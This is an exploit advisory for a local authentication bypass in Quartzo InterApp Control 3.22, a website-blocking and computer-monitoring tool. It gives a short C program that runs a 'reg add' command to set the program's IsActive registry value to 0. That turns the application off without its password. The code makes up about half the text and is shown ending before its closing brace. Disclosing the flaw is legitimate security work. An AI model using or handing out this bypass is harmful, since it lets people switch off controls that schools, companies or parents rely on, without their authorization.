* Title: Quartzo InterApp Control 3.22 Authentication Bypass
* Date: 02-07-12
* Category: Local
* Vendor website: http://www.quartzo.com.br/
* Author: Rodrigo Santos
* Contact: xsrv@hotmail.com
* Tested on: Quartzo InterApp Control (free) version 3.22 on Windows 7 Enterprise 64-bit
* Product detail:
* Quartzo InterApp Control is an application used to block websites, applications, and monitor computers in many schools and companies.
* There is also a good number of home users.
* Vulnerability:
* By editing the Windows registry, an attacker can bypass the application's screen that asks for the password.
#include <stdio.h>
int main() {
printf("Deactivating Quartzo InterApp Control...\n");
system("reg add HKEY_CURRENT_USER\\Software\\qubnfe /v IsActive /t REG_SZ /d 0 /f");
return 0;